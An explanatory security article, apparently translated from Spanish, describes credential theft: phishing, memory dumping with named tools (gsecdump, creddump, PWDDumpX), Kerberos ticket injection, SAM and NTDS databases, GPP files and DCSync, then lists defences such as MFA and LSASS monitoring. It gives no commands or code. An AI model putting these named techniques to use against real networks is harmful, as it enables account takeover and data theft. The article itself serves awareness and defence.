Theft of Credentials: How to Avoid This Attack

What is credential theft?

Theft of credentials is considered one of the modern hacking techniques. It consists of the extraction of the authentication credentials of one or more users. They include the users and passwords that are used to enter the victims’ computers. Once the cybercriminal appropriates those credentials, he will have the possibility of accessing the content of the compromised computers, so he can do this as many times as he wants.

Not only will you be able to count on the various files and data typical of the victims’ computers, you will also be able to communicate with others to carry out the same or different types of attacks. The theft of credentials is very flexible with the cybercriminal, since it could take over multiple users and passwords that are stored on a single computer. In turn, each of these credentials will provide access to other computers on the same network and that it also contains several credentials that can be appropriated.

As you may have noticed, it is an attack that can leave great consequences on a network. In a few minutes, an entire network can be compromised. Consequently, all the data found in each of the connected computers is exposed. All this catastrophe can happen, only because a person manages to open a “legitimate” email, but in fact it is phishing .

Keep in mind that the latter may seem like an innocent attack, however, it is the gateway that leads to more severe attacks such as ransomware. Even a variant of phishing called Spear Phishing is the distribution of malicious emails to specific people within a network, or an organization. The content of these messages can easily be confusing because the cybercriminals are in charge of studying the victims completely.

The danger of logging in once

Corporate networks are the main victims of credential theft. More than anything because most of these allow the username and password to be entered by the person only once. The indicated credentials are stored in memory and these allow access to a large part of the network resources. It is even possible to already have access to everything that is needed to operate.

Theft of credentials in action

The cybercriminal has a green light to carry out this type of attack when he has access to a computer at the lowest level. So you can execute code and execute various sets of instructions such as the extraction of credentials stored in memory. There are several tools for this purpose like gsecdump, creddump and PWDDumpX.

Now where can you get credentials from? One of the targets of the cybercriminals is in Kerberos . Theoretically, it is one of the most secure protocols since it was specifically designed for secure authentication. It does this through a ticket system that provides permissions to both users and services. However, credential theft violates your capabilities by injecting stolen Kerberos tickets to gain legitimate access.

Another very common and well-known objective is SAM (Security Accounts Manager) . In Spanish, it means Management of Security Accounts . It consists of a file that functions as a database. This is used to authenticate users both locally and remotely. Such authentication is possible by crossing the credentials entered by the person with what exists in the SAM file.

The big problem with SAM is that if that “master” file can be found, the credentials can be decrypted. So in a very short time, you can count on hundreds of thousands of users and passwords that will compromise their corresponding computers and associated services.

Theft of credentials from a domain controller on a network

• NTDS . This is the domain where the Active Directory service stores all the information related to the users that belong to the domain, in order to verify the credentials: username and password.
• Group Policy Preference files . It is a tool of the Windows operating system. It allows to implement domain policies that include credentials, facilitating their administration. These policies are usually stored in a place called SYSVOL . If someone with malicious intent has access to it, they can access and decrypt the content.

Now, there are domain controllers that support API calls . Cybercriminals use a technique called DCSync , which mimics the features and functionality of this type of domain controller. Thus, it achieves that the original controller sends the hashes corresponding to the credentials and thus, performs the attacks that it has in mind.

How to prevent credential theft

Professionals in the sector agree that avoiding such attacks seems practically impossible. However, a recommended action that minimizes the chances of attack is to not generate as many users with administrator privileges. In other words, only the necessary ones should exist.

Also, the mass adoption of multi-factor authentication is recommended. In this way, it is easier and more efficient to guarantee that the person who is logging in is really the user, and that it is not a malicious user. This type of implementation also helps users to become aware of the importance of properly managing credentials, and most importantly, that they should not be shared with others.

On the other hand, Cisco Blogs recommends the following actions:

• Monitoring of access to services such as LSASS (Local Security Authority Subsystem Service) and databases such as SAM (Security Accounts Manager) .
• Take a look at command lines that correspond to arguments that are typical of credential theft.
• In the case of domain controllers:
  • All logs should be monitored for suspicious activity at unusual times.
  • Verify if there are unexpected connections that come from IP addresses that are not assigned to any of the domain controllers.

Theft of credentials is one of the most dangerous attacks, hands down. In any case, it is possible to prevent it to a great extent already from the most essential level. That is, the end user. Let’s take these recommendations into account and protect what matters most to us at all times: our data .